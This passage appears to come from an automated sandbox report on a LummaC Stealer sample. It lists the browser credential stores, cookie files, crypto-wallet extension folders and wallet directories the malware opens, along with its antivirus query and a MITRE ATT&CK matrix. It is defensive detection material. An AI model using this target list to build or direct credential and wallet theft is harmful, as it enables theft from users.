              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_00402FD8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00402FD8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeCode function: 6_2_00007FF764A367A8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,6_2_00007FF764A367A8
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: msiexec.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: msiexec.exeString found in binary or memory: Wallets/ElectronCash
              Source: msiexec.exeString found in binary or memory: Jaxx Liberty
              Source: msiexec.exeString found in binary or memory: window-state.json
              Source: msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletn5o
              Source: msiexec.exeString found in binary or memory: ExodusWeb3
              Source: msiexec.exeString found in binary or memory: Wallets/Ethereum
              Source: msiexec.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: msiexec.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: Yara matchFile source: 0000000B.00000003.2399976992.0000000003406000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		11
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		1
              Registry Run Keys / Startup Folder              		11
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Credential API Hooking              		12
              File and Directory Discovery              		Remote Desktop Protocol31
              Data from Local System              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              Command and Scripting Interpreter              		Logon Script (Windows)211
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager232
              System Information Discovery              		SMB/Windows Admin Shares1
              Credential API Hooking              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		Login Hook1
              Registry Run Keys / Startup Folder              		11
              Software Packing              		NTDS331
              Security Software Discovery              		Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets1
              Process Discovery              		SSHKeylogging115
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              DLL Side-Loading              		Cached Domain Credentials121
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
